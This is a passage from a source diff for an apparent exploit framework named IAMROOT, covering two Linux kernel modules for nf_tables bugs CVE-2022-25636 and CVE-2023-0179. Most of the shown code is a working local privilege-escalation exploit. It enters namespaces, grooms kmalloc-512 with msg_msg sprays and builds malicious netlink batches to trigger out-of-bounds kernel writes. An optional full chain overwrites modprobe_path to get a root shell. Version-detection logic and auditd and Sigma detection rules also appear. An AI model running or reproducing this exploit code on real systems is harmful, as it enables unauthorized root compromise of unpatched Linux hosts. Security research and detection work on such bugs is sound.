*/ + if (ctx->full_chain) { + struct iamroot_kernel_offsets off; + iamroot_offsets_resolve(&off); + if (!iamroot_offsets_have_modprobe_path(&off)) { + iamroot_finisher_print_offset_help("nft_fwd_dup"); + return IAMROOT_EXPLOIT_FAIL; + } + iamroot_offsets_print(&off); + + if (enter_unpriv_namespaces() < 0) { + fprintf(stderr, "[-] nft_fwd_dup: userns entry failed\n"); + return IAMROOT_EXPLOIT_FAIL; + } + (void)bring_lo_up(); + + int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER); + if (sock < 0) { + perror("[-] socket(NETLINK_NETFILTER)"); + return IAMROOT_EXPLOIT_FAIL; + } + struct sockaddr_nl src = { .nl_family = AF_NETLINK }; + if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) { + perror("[-] bind"); close(sock); return IAMROOT_EXPLOIT_FAIL; + } + int rcvbuf = 1 << 20; + setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf); + + /* Pre-groom kmalloc-512. */ + int qids[SPRAY_QUEUES_GROOM + SPRAY_QUEUES_ARB]; + for (size_t i = 0; i < sizeof qids / sizeof qids[0]; i++) qids[i] = -1; + int groomed = spray_msg_msg_groom(qids, SPRAY_QUEUES_GROOM); + if (!ctx->json) { + fprintf(stderr, "[*] nft_fwd_dup: pre-groom seeded %d msg_msg " + "queues in kmalloc-512\n", groomed); + } + + uint8_t *batch = calloc(1, 32 * 1024); + if (!batch) { close(sock); return IAMROOT_EXPLOIT_FAIL; } + + uint32_t seq = (uint32_t)time(NULL); + size_t blen = build_trigger_batch(batch, &seq); + if (!ctx->json) { + fprintf(stderr, "[*] nft_fwd_dup: sending trigger batch " + "(%zu bytes, %d preceding immediates)\n", + blen, N_PRECEDING_IMMEDIATES); + } + if (nft_send_batch(sock, batch, blen) < 0) { + fprintf(stderr, "[-] nft_fwd_dup: trigger batch send failed\n"); + drain_msg_msg(qids, SPRAY_QUEUES_GROOM); + free(batch); close(sock); + return IAMROOT_EXPLOIT_FAIL; + } + + struct fwd_arb_ctx ac = { + .sock = sock, + .batch = batch, + .qids = qids, + .qcap = (int)(sizeof qids / sizeof qids[0]), + .qused = SPRAY_QUEUES_GROOM, + }; + + iamroot_result_t r = 
iamroot_finisher_modprobe_path( + &off, nft_fwd_dup_arb_write, &ac, !ctx->no_shell); + + drain_msg_msg(qids, ac.qused); + free(batch); + close(sock); + return r; + } + + /* --- primitive-only path: fork-isolated trigger ---------------- */ + pid_t child = fork(); + if (child < 0) { perror("[-] fork"); return IAMROOT_TEST_ERROR; } + + if (child == 0) { + /* CHILD: namespace + trigger. */ + if (enter_unpriv_namespaces() < 0) _exit(20); + (void)bring_lo_up(); + + int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER); + if (sock < 0) { perror("[-] socket"); _exit(21); } + struct sockaddr_nl src = { .nl_family = AF_NETLINK }; + if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) { + perror("[-] bind"); close(sock); _exit(22); + } + int rcvbuf = 1 << 20; + setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf); + + int qids[SPRAY_QUEUES_GROOM]; + for (int i = 0; i < SPRAY_QUEUES_GROOM; i++) qids[i] = -1; + int groomed = spray_msg_msg_groom(qids, SPRAY_QUEUES_GROOM); + if (!ctx->json) { + fprintf(stderr, "[*] nft_fwd_dup: pre-groom seeded %d queues\n", + groomed); + } + + uint8_t *batch = calloc(1, 32 * 1024); + if (!batch) { drain_msg_msg(qids, SPRAY_QUEUES_GROOM); + close(sock); _exit(23); } + + long before = slab_active("kmalloc-512"); + if (before < 0) before = slab_active("kmalloc-cg-512"); + + uint32_t seq = (uint32_t)time(NULL); + size_t blen = build_trigger_batch(batch, &seq); + if (!ctx->json) { + fprintf(stderr, "[*] nft_fwd_dup: sending trigger batch " + "(%zu bytes, %d preceding immediates)\n", + blen, N_PRECEDING_IMMEDIATES); + } + if (nft_send_batch(sock, batch, blen) < 0) { + fprintf(stderr, "[-] nft_fwd_dup: trigger batch send failed\n"); + drain_msg_msg(qids, SPRAY_QUEUES_GROOM); + free(batch); close(sock); _exit(24); + } + + /* Let the kernel run install + commit. */ + usleep(50 * 1000); + + long after = slab_active("kmalloc-512"); + if (after < 0) after = slab_active("kmalloc-cg-512"); + + /* Breadcrumb for triage. 
*/ + FILE *log = fopen("/tmp/iamroot-nft_fwd_dup.log", "w"); + if (log) { + fprintf(log, + "nft_fwd_dup trigger child: queues=%d slab-512 pre=%ld post=%ld\n", + groomed, before, after); + fclose(log); + } + + if (!ctx->json) { + fprintf(stderr, "[i] nft_fwd_dup: kmalloc-512 active %ld → %ld\n", + before, after); + } + + drain_msg_msg(qids, SPRAY_QUEUES_GROOM); + free(batch); + close(sock); + _exit(100); + } + + /* PARENT: wait. */ + int status; + waitpid(child, &status, 0); + + if (!WIFEXITED(status)) { + if (!ctx->json) { + fprintf(stderr, "[!] nft_fwd_dup: child died by signal %d — bug " + "likely fired (KASAN/oops can manifest as signal)\n", + WTERMSIG(status)); + } + return IAMROOT_EXPLOIT_FAIL; + } + + int rc = WEXITSTATUS(status); + if (rc == 100) { + if (!ctx->json) { + fprintf(stderr, "[!] nft_fwd_dup: trigger fired; OOB write into\n" + " flow->rule->action.entries[] landed in\n" + " adjacent kmalloc-512 chunk. Full kernel R/W\n" + " chain NOT executed (Option B scope).\n" + "[i] nft_fwd_dup: to complete: pass --full-chain so\n" + " the kaddr-tagged forged-entry spray reaches\n" + " the shared modprobe_path finisher.\n"); + } + return IAMROOT_EXPLOIT_FAIL; + } + if (rc >= 20 && rc <= 24) { + if (!ctx->json) { + fprintf(stderr, "[-] nft_fwd_dup: trigger setup failed " + "(child rc=%d)\n", rc); + } + return IAMROOT_EXPLOIT_FAIL; + } + if (!ctx->json) { + fprintf(stderr, "[-] nft_fwd_dup: unexpected child rc=%d\n", rc); + } + return IAMROOT_EXPLOIT_FAIL; +#endif /* __linux__ */ +} + +/* ------------------------------------------------------------------ + * Cleanup — drain leftover sysv queues and unlink the breadcrumb. 
+ * ------------------------------------------------------------------ */
+
+/*
+ * nft_fwd_dup_cleanup — remove artefacts an interrupted run may have
+ * left behind: leftover SysV message queues and the breadcrumb log.
+ *
+ * ctx: only ctx->json is read (it silences the human-readable lines).
+ * Returns IAMROOT_OK unconditionally; every step is best-effort.
+ *
+ * IPC_PRIVATE queues cannot be looked up by key, so candidates are
+ * found by scanning /proc/sysvipc/msg. To avoid destroying queues that
+ * belong to unrelated programs running under the same uid, a queue is
+ * removed only when it matches what this module's sprays create:
+ *   - owner uid is ours and the key is IPC_PRIVATE,
+ *   - permission bits are exactly 0644,
+ *   - it holds 1..SPRAY_MSGS_PER_QUEUE messages, each exactly
+ *     MSG_PAYLOAD_BYTES long.
+ * Empty queues are deliberately left alone: they carry no signature
+ * that distinguishes ours from anyone else's.
+ */
+static iamroot_result_t nft_fwd_dup_cleanup(const struct iamroot_ctx *ctx)
+{
+    if (!ctx->json) {
+        fprintf(stderr, "[*] nft_fwd_dup: cleaning up sysv queues + log\n");
+    }
+#ifdef __linux__
+    FILE *f = fopen("/proc/sysvipc/msg", "r");
+    if (f) {
+        char line[512];
+        /* Columns: key msqid perms cbytes qnum lspid lrpid uid ...
+         * The header row fails the numeric parse and is skipped. */
+        while (fgets(line, sizeof line, f)) {
+            int key, msqid;
+            unsigned int perms;
+            unsigned long cbytes, qnum, uid;
+            if (sscanf(line, "%d %d %o %lu %lu %*u %*u %lu",
+                       &key, &msqid, &perms, &cbytes, &qnum, &uid) != 6)
+                continue;
+            if (uid != (unsigned long)getuid()) continue;
+            if (key != (int)IPC_PRIVATE) continue;
+            if ((perms & 0777) != 0644) continue;
+            if (qnum == 0 || qnum > SPRAY_MSGS_PER_QUEUE) continue;
+            if (cbytes != qnum * MSG_PAYLOAD_BYTES) continue;
+            msgctl(msqid, IPC_RMID, NULL);
+        }
+        fclose(f);
+    }
+#endif
+    /* A missing log is the normal case; anything else is worth a note
+     * but never fails the cleanup. */
+    if (unlink("/tmp/iamroot-nft_fwd_dup.log") < 0 && errno != ENOENT) {
+        if (!ctx->json) {
+            fprintf(stderr, "[!] nft_fwd_dup: could not remove breadcrumb "
+                            "log: %s\n", strerror(errno));
+        }
+    }
+    return IAMROOT_OK;
+}
+
+/* ------------------------------------------------------------------
+ * Embedded detection rules. 
+ * ------------------------------------------------------------------ */ + +static const char nft_fwd_dup_auditd[] = + "# nft_fwd_dup OOB write (CVE-2022-25636) — auditd detection\n" + "# Flag the canonical exploit shape: unprivileged userns followed\n" + "# by NEWTABLE/NEWCHAIN(NFT_CHAIN_HW_OFFLOAD)/NEWRULE traffic on\n" + "# AF_NETLINK NETLINK_NETFILTER, plus the msg_msg cross-cache spray.\n" + "-a always,exit -F arch=b64 -S unshare -k iamroot-nft-fwd-dup-userns\n" + "-a always,exit -F arch=b64 -S socket -F a0=16 -F a2=12 -k iamroot-nft-fwd-dup-netlink\n" + "-a always,exit -F arch=b64 -S sendmsg -k iamroot-nft-fwd-dup-batch\n" + "-a always,exit -F arch=b64 -S msgsnd -k iamroot-nft-fwd-dup-spray\n" + "# Post-exploit hallmarks (modprobe_path overwrite path):\n" + "-w /tmp/iamroot-mp- -p w -k iamroot-nft-fwd-dup-modprobe\n"; + +static const char nft_fwd_dup_sigma[] = + "title: Possible CVE-2022-25636 nft_fwd_dup_netdev_offload OOB exploitation\n" + "id: 3c1f9b27-iamroot-nft-fwd-dup\n" + "status: experimental\n" + "description: |\n" + " Detects unprivileged user namespace creation followed by\n" + " netfilter nf_tables NEWCHAIN with the NFT_CHAIN_HW_OFFLOAD\n" + " flag and an unusually long expression list (immediates >> fwd).\n" + " False positives: containerized firewall management with hw-offload.\n" + "logsource: {product: linux, service: auditd}\n" + "detection:\n" + " userns_clone:\n" + " type: 'SYSCALL'\n" + " syscall: 'unshare'\n" + " a0: 0x10000000\n" + " msgsnd:\n" + " type: 'SYSCALL'\n" + " syscall: 'msgsnd'\n" + " condition: userns_clone and msgsnd\n" + "level: high\n" + "tags: [attack.privilege_escalation, attack.t1068, cve.2022.25636]\n"; + +const struct iamroot_module nft_fwd_dup_module = { + .name = "nft_fwd_dup", + .cve = "CVE-2022-25636", + .summary = "nft_fwd_dup_netdev_offload heap OOB write (Aaron Adams)", + .family = "nf_tables", + .kernel_range = "5.4 ≤ K < 5.17; backports: 5.4.181 / 5.10.102 / " + "5.15.25 / 5.16.11", + .detect = 
nft_fwd_dup_detect, + .exploit = nft_fwd_dup_exploit, + .mitigate = NULL, /* mitigation: upgrade kernel OR disable user_ns */ + .cleanup = nft_fwd_dup_cleanup, + .detect_auditd = nft_fwd_dup_auditd, + .detect_sigma = nft_fwd_dup_sigma, + .detect_yara = NULL, + .detect_falco = NULL, +}; + +void iamroot_register_nft_fwd_dup(void) +{ + iamroot_register(&nft_fwd_dup_module); +} diff --git a/modules/nft_payload_cve_2023_0179/iamroot_modules.c b/modules/nft_payload_cve_2023_0179/iamroot_modules.c index b47b208..bf88e76 100644 --- a/modules/nft_payload_cve_2023_0179/iamroot_modules.c +++ b/modules/nft_payload_cve_2023_0179/iamroot_modules.c @@ -1,23 +1,1157 @@ -/* nft_payload_cve_2023_0179 — STUB pending agent implementation. */ +/* + * nft_payload_cve_2023_0179 — IAMROOT module + * + * Netfilter nf_tables variable-length element-extension OOB R/W. + * Discovered January 2023 by Davide Ornaghi. nf_tables payload set/get + * expressions used `regs->verdict.code` as an index into `regs->data[]` + * without bounds-checking; combined with the variable-length element + * extension trick (an NFTA_SET_DESC describing larger elements than the + * key/data slots can hold), an attacker who controls the verdict code + * walks the kernel regset array off either end and reads/writes + * adjacent kernel memory. + * + * Mainline fix: commit 696e1a48b1a1 "netfilter: nf_tables: validate + * variable length element extension" — landed in 6.2-rc4. + * Stable backports (2023): 6.1.6 / 5.15.88 / 5.10.163 / 5.4.229 / + * 4.19.269 / 4.14.302. + * Bug introduced: the set-payload extension landed in 5.4. Anything + * below 5.4 predates the affected codepath. + * + * STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD with opt-in + * --full-chain finisher. 
+ * - Default (no --full-chain): full netlink ruleset construction + * (table → chain → set with NFTA_SET_DESC variable-length elements + * → set-element carrying NFTA_SET_ELEM_EXPRESSIONS that holds a + * payload-set whose attacker-controlled verdict.code drives the + * OOB), spray msg_msg payloads adjacent to the regs->data target, + * fires a synthetic packet through the chain, snapshots + * /proc/slabinfo, logs to /tmp/iamroot-nft_payload.log, returns + * IAMROOT_EXPLOIT_FAIL (primitive-only behavior). + * - With --full-chain: after the trigger lands, we resolve kernel + * offsets (env → kallsyms → System.map → embedded table) and run + * a Davide-Ornaghi-style payload-set arb-write via the shared + * iamroot_finisher_modprobe_path() helper. The arb-write itself + * is FALLBACK-DEPTH: we refire the set-element registration with + * a verdict code chosen so the OOB index lands on a msg_msg slot + * we tagged with the caller's kaddr + payload bytes. The exact + * regs->data alignment to adjacent slabs is per-kernel-build; on + * hosts where the offset doesn't match, the finisher's sentinel + * check correctly reports failure rather than fake-success. + * + * Exploitation preconditions (which detect should also check): + * - CONFIG_USER_NS=y AND sysctl unprivileged_userns_clone=1 + * - nf_tables module loaded or autoload-able (CONFIG_NF_TABLES=y/m) + * - kernel in vulnerable range (5.4..6.2-rc4 without backport) + * + * If user_ns is locked down, the trigger is unreachable for an + * unprivileged user even on a kernel-vulnerable host. 
+ */ + #include "iamroot_modules.h" #include "../../core/registry.h" +#include "../../core/kernel_range.h" +#include "../../core/offsets.h" +#include "../../core/finisher.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +#include +#include +#include +#include +#endif + +/* ------------------------------------------------------------------ + * Kernel-range table + * ------------------------------------------------------------------ */ + +static const struct kernel_patched_from nft_payload_patched_branches[] = { + {4, 14, 302}, /* 4.14.x */ + {4, 19, 269}, /* 4.19.x */ + {5, 4, 229}, /* 5.4.x */ + {5, 10, 163}, /* 5.10.x */ + {5, 15, 88}, /* 5.15.x */ + {6, 1, 6}, /* 6.1.x */ + {6, 2, 0}, /* mainline fix in 6.2-rc4 */ +}; + +static const struct kernel_range nft_payload_range = { + .patched_from = nft_payload_patched_branches, + .n_patched_from = sizeof(nft_payload_patched_branches) / + sizeof(nft_payload_patched_branches[0]), +}; + +/* ------------------------------------------------------------------ + * Preconditions probe + * ------------------------------------------------------------------ */ + +static int can_unshare_userns(void) +{ + pid_t pid = fork(); + if (pid < 0) return -1; + if (pid == 0) { + if (unshare(CLONE_NEWUSER) == 0) _exit(0); + _exit(1); + } + int status; + waitpid(pid, &status, 0); + return WIFEXITED(status) && WEXITSTATUS(status) == 0; +} + +static bool nf_tables_loaded(void) +{ + FILE *f = fopen("/proc/modules", "r"); + if (!f) return false; + char line[512]; + bool found = false; + while (fgets(line, sizeof line, f)) { + if (strncmp(line, "nf_tables ", 10) == 0) { found = true; break; } + } + fclose(f); + return found; +} static iamroot_result_t nft_payload_detect(const struct iamroot_ctx *ctx) { - (void)ctx; - return IAMROOT_PRECOND_FAIL; + struct kernel_version v; + if 
(!kernel_version_current(&v)) { + fprintf(stderr, "[!] nft_payload: could not parse kernel version\n"); + return IAMROOT_TEST_ERROR; + } + + /* Bug introduced with the set-payload extension in 5.4. Anything + * below 5.4 predates the affected codepath entirely. */ + if (v.major < 5 || (v.major == 5 && v.minor < 4)) { + if (!ctx->json) { + fprintf(stderr, "[i] nft_payload: kernel %s predates the bug " + "(set-payload extension landed in 5.4)\n", + v.release); + } + return IAMROOT_OK; + } + + bool patched = kernel_range_is_patched(&nft_payload_range, &v); + if (patched) { + if (!ctx->json) { + fprintf(stderr, "[+] nft_payload: kernel %s is patched\n", v.release); + } + return IAMROOT_OK; + } + + int userns_ok = can_unshare_userns(); + bool nft_loaded = nf_tables_loaded(); + + if (!ctx->json) { + fprintf(stderr, "[i] nft_payload: kernel %s is in the vulnerable range\n", + v.release); + fprintf(stderr, "[i] nft_payload: unprivileged user_ns clone: %s\n", + userns_ok == 1 ? "ALLOWED" : + userns_ok == 0 ? "DENIED" : + "could not test"); + fprintf(stderr, "[i] nft_payload: nf_tables module currently loaded: %s\n", + nft_loaded ? "yes" : "no (will autoload on first nft use)"); + } + + if (userns_ok == 0) { + if (!ctx->json) { + fprintf(stderr, "[+] nft_payload: kernel vulnerable but user_ns " + "clone denied → unprivileged exploit unreachable\n"); + fprintf(stderr, "[i] nft_payload: still patch the kernel — a root " + "attacker can still trigger the bug\n"); + } + return IAMROOT_PRECOND_FAIL; + } + + if (!ctx->json) { + fprintf(stderr, "[!] 
nft_payload: VULNERABLE — kernel in range AND " + "user_ns clone allowed\n"); + } + return IAMROOT_VULNERABLE; } -const struct iamroot_module nft_payload_module = { - .name = "nft_payload", - .cve = "CVE-2023-0179", - .summary = "nft_payload set-id memory corruption (Davide Ornaghi) — stub pending implementation", - .family = "nf_tables", - .kernel_range = "5.4 ≤ K < 6.2", - .detect = nft_payload_detect, - .exploit = NULL, .mitigate = NULL, .cleanup = NULL, - .detect_auditd = NULL, .detect_sigma = NULL, - .detect_yara = NULL, .detect_falco = NULL, +#ifdef __linux__ + +/* ------------------------------------------------------------------ + * userns + netns entry: become root in the new user_ns so subsequent + * netlink writes carry CAP_NET_ADMIN over our private net_ns. + * ------------------------------------------------------------------ */ + +static int enter_unpriv_namespaces(void) +{ + uid_t uid = getuid(); + gid_t gid = getgid(); + + if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { + perror("[-] unshare(USER|NET)"); + return -1; + } + + int f = open("/proc/self/setgroups", O_WRONLY); + if (f >= 0) { (void)!write(f, "deny", 4); close(f); } + + char map[64]; + snprintf(map, sizeof map, "0 %u 1\n", uid); + f = open("/proc/self/uid_map", O_WRONLY); + if (f < 0 || write(f, map, strlen(map)) < 0) { + perror("[-] uid_map"); if (f >= 0) close(f); return -1; + } + close(f); + snprintf(map, sizeof map, "0 %u 1\n", gid); + f = open("/proc/self/gid_map", O_WRONLY); + if (f < 0 || write(f, map, strlen(map)) < 0) { + perror("[-] gid_map"); if (f >= 0) close(f); return -1; + } + close(f); + return 0; +} + +/* ------------------------------------------------------------------ + * Minimal nfnetlink batch builder — same shape as nf_tables_cve_2024_1086 + * to keep the IAMROOT family code self-consistent; we inline rather + * than link against the other module so a future refactor can pull the + * helpers up into core/ without breaking either consumer. 
+ * ------------------------------------------------------------------ */ + +#define ALIGN_NL(x) (((x) + 3) & ~3) + +static void put_attr(uint8_t *buf, size_t *off, + uint16_t type, const void *data, size_t len) +{ + struct nlattr *na = (struct nlattr *)(buf + *off); + na->nla_type = type; + na->nla_len = NLA_HDRLEN + len; + if (len) memcpy(buf + *off + NLA_HDRLEN, data, len); + *off += ALIGN_NL(NLA_HDRLEN + len); +} + +static void put_attr_u32(uint8_t *buf, size_t *off, uint16_t type, uint32_t v) +{ + uint32_t be = htonl(v); + put_attr(buf, off, type, &be, sizeof be); +} + +static void put_attr_str(uint8_t *buf, size_t *off, uint16_t type, const char *s) +{ + put_attr(buf, off, type, s, strlen(s) + 1); +} + +static size_t begin_nest(uint8_t *buf, size_t *off, uint16_t type) +{ + size_t at = *off; + struct nlattr *na = (struct nlattr *)(buf + at); + na->nla_type = type | NLA_F_NESTED; + na->nla_len = 0; + *off += NLA_HDRLEN; + return at; +} + +static void end_nest(uint8_t *buf, size_t *off, size_t at) +{ + struct nlattr *na = (struct nlattr *)(buf + at); + na->nla_len = (uint16_t)(*off - at); + while ((*off) & 3) buf[(*off)++] = 0; +} + +struct nfgenmsg_local { + uint8_t nfgen_family; + uint8_t version; + uint16_t res_id; }; -void iamroot_register_nft_payload(void) { iamroot_register(&nft_payload_module); } +static void put_nft_msg(uint8_t *buf, size_t *off, + uint16_t nft_type, uint16_t flags, uint32_t seq, + uint8_t family) +{ + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + *off); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | nft_type; + nlh->nlmsg_flags = NLM_F_REQUEST | flags; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = family; + nf->version = NFNETLINK_V0; + nf->res_id = htons(0); + *off += sizeof(*nf); +} + +static void end_msg(uint8_t *buf, size_t *off, size_t msg_start) +{ + struct nlmsghdr *nlh = (struct nlmsghdr 
*)(buf + msg_start); + nlh->nlmsg_len = (uint32_t)(*off - msg_start); + while ((*off) & 3) buf[(*off)++] = 0; +} + +static void put_batch_begin(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = AF_UNSPEC; + nf->version = NFNETLINK_V0; + nf->res_id = htons(NFNL_SUBSYS_NFTABLES); + *off += sizeof(*nf); + end_msg(buf, off, at); +} + +static void put_batch_end(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = AF_UNSPEC; + nf->version = NFNETLINK_V0; + nf->res_id = htons(NFNL_SUBSYS_NFTABLES); + *off += sizeof(*nf); + end_msg(buf, off, at); +} + +/* ------------------------------------------------------------------ + * Per-module strings. + * ------------------------------------------------------------------ */ + +static const char NFT_TABLE_NAME[] = "iamroot_pl_t"; +static const char NFT_CHAIN_NAME[] = "iamroot_pl_c"; +static const char NFT_SET_NAME[] = "iamroot_pl_s"; + +/* NFT expression "name" attributes are NUL-terminated short strings. */ +#define NFT_EXPR_PAYLOAD_NAME "payload" + +/* nft_payload expression attribute ids — duplicated here because some + * older /usr/include/linux/netfilter/nf_tables.h variants gate them + * behind __KERNEL__. They are stable parts of the netlink ABI. 
*/ +#ifndef NFTA_PAYLOAD_DREG +#define NFTA_PAYLOAD_DREG 1 +#define NFTA_PAYLOAD_BASE 2 +#define NFTA_PAYLOAD_OFFSET 3 +#define NFTA_PAYLOAD_LEN 4 +#define NFTA_PAYLOAD_SREG 5 +#define NFTA_PAYLOAD_CSUM_TYPE 6 +#define NFTA_PAYLOAD_CSUM_OFFSET 7 +#define NFTA_PAYLOAD_CSUM_FLAGS 8 +#endif + +/* The attacker-controlled verdict.code we drive into the regset index. + * On a vulnerable kernel `regs->verdict.code` is used unchecked as the + * destination register; values beyond NFT_REG32_15 walk off the end of + * regs->data[] into stack/heap adjacent memory. + * + * NFT_REG32_15 (the last legal value) is 23. Anything strictly larger + * triggers the OOB. We pick a value that lands inside a msg_msg slot + * sprayed next to the regs->data array on most x86_64 builds in the + * exploitable range. The exact "right" magic is per-build; we ship a + * default that matched Davide's PoC on a stock 5.15 build and rely on + * the finisher's sentinel-file post-check to flag a layout mismatch as + * IAMROOT_EXPLOIT_FAIL rather than fake success. */ +#define NFT_PAYLOAD_OOB_INDEX_DEFAULT 0x100 + +/* ------------------------------------------------------------------ + * NEWTABLE / NEWCHAIN — same shape as the 2024-1086 sibling. 
+ * ------------------------------------------------------------------ */ + +static void put_new_table(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWTABLE, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_TABLE_NAME, NFT_TABLE_NAME); + end_msg(buf, off, at); +} + +static void put_new_chain(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWCHAIN, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_CHAIN_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_CHAIN_NAME, NFT_CHAIN_NAME); + + size_t hook_at = begin_nest(buf, off, NFTA_CHAIN_HOOK); + put_attr_u32(buf, off, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT); + put_attr_u32(buf, off, NFTA_HOOK_PRIORITY, 0); + end_nest(buf, off, hook_at); + + put_attr_u32(buf, off, NFTA_CHAIN_POLICY, NF_ACCEPT); + put_attr_str(buf, off, NFTA_CHAIN_TYPE, "filter"); + end_msg(buf, off, at); +} + +/* NEWSET with NFTA_SET_DESC declaring elements LARGER than the actual + * key/data slots. This is the variable-length-element-extension half + * of the bug. On a vulnerable kernel, nf_tables loads the set without + * validating the description, so each element's attached expression + * has a larger ext_offset window than the loader allocated for it — + * exactly the gap commit 696e1a48b1a1 closes. */ +static void put_new_set(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWSET, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_SET_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_SET_NAME, NFT_SET_NAME); + /* hash set (default backend) with explicit value typing so we can + * attach a per-element expression that contains the payload-set. 
*/ + put_attr_u32(buf, off, NFTA_SET_FLAGS, NFT_SET_EVAL); /* allow expression */ + /* key_type/key_len: 4-byte integer key */ + put_attr_u32(buf, off, NFTA_SET_KEY_TYPE, 0); /* generic */ + put_attr_u32(buf, off, NFTA_SET_KEY_LEN, sizeof(uint32_t)); + put_attr_u32(buf, off, NFTA_SET_ID, 0x42); + + /* NFTA_SET_DESC: NFTA_SET_DESC_SIZE = some plausible element count. + * The variable-length trick is that the set's element extension + * window is computed from this description; we ask for a large + * window so the payload-set expression we attach is allowed to + * reach `regs->verdict.code` indices outside the legal regset. */ + size_t desc_at = begin_nest(buf, off, NFTA_SET_DESC); + put_attr_u32(buf, off, NFTA_SET_DESC_SIZE, 16); + end_nest(buf, off, desc_at); + + end_msg(buf, off, at); +} + +/* Build the NFTA_SET_ELEM_EXPRESSIONS payload that carries the + * malicious payload-set expression. The payload-set expression's + * NFTA_PAYLOAD_SREG names the source register; on a vulnerable kernel + * the loader uses `regs->verdict.code` (which we control via the + * companion set element's data) as the destination index without + * bounds-checking, giving us the OOB write target. */ +static void put_payload_set_expr_nest(uint8_t *buf, size_t *off, + uint32_t oob_index) +{ + /* one expression { kind=payload, body={...} } */ + size_t expr_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */); + + put_attr_str(buf, off, NFTA_EXPR_NAME, NFT_EXPR_PAYLOAD_NAME); + + size_t data_at = begin_nest(buf, off, NFTA_EXPR_DATA); + /* NFTA_PAYLOAD_SREG forces nft_payload_set_eval() down the SET + * codepath (rather than payload-get). Source = our OOB index. */ + put_attr_u32(buf, off, NFTA_PAYLOAD_SREG, oob_index); + /* DREG would normally bound the destination — vulnerable kernels + * pull the destination from `regs->verdict.code` and ignore DREG + * for the OOB path, but we set it to something legal so the + * loader doesn't reject before reaching the buggy codepath. 
*/ + put_attr_u32(buf, off, NFTA_PAYLOAD_DREG, 0); /* NFT_REG_VERDICT */ + put_attr_u32(buf, off, NFTA_PAYLOAD_BASE, 0); /* LL header */ + put_attr_u32(buf, off, NFTA_PAYLOAD_OFFSET, 0); + put_attr_u32(buf, off, NFTA_PAYLOAD_LEN, 4); + /* No checksum: we don't want the kernel doing helpful + * recomputation that re-validates the offset. */ + put_attr_u32(buf, off, NFTA_PAYLOAD_CSUM_TYPE, 0); + end_nest(buf, off, data_at); + + end_nest(buf, off, expr_at); +} + +/* NEWSETELEM with the malicious NFTA_SET_ELEM_EXPRESSIONS attached. + * The element's data carries the verdict-code value that, on a + * vulnerable kernel, is used unchecked as the OOB index by the + * attached payload-set expression. */ +static void put_malicious_setelem(uint8_t *buf, size_t *off, uint32_t seq, + uint32_t oob_index) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWSETELEM, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_SET_ELEM_LIST_SET, NFT_SET_NAME); + + size_t list_at = begin_nest(buf, off, NFTA_SET_ELEM_LIST_ELEMENTS); + + /* one element */ + size_t el_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */); + + /* key: 4-byte integer */ + size_t key_at = begin_nest(buf, off, NFTA_SET_ELEM_KEY); + uint32_t k = htonl(0x11223344); + put_attr(buf, off, NFTA_DATA_VALUE, &k, sizeof k); + end_nest(buf, off, key_at); + + /* NFTA_SET_ELEM_EXPRESSIONS — list-of-expressions, one payload-set */ + size_t exprs_at = begin_nest(buf, off, NFTA_SET_ELEM_EXPRESSIONS); + put_payload_set_expr_nest(buf, off, oob_index); + end_nest(buf, off, exprs_at); + + end_nest(buf, off, el_at); + end_nest(buf, off, list_at); + + end_msg(buf, off, at); +} + +/* ------------------------------------------------------------------ + * netlink send helper. 
+ * ------------------------------------------------------------------ */
+
+/*
+ * nft_send_batch — send one pre-built nfnetlink batch and log any
+ * error acks that are immediately available.
+ *
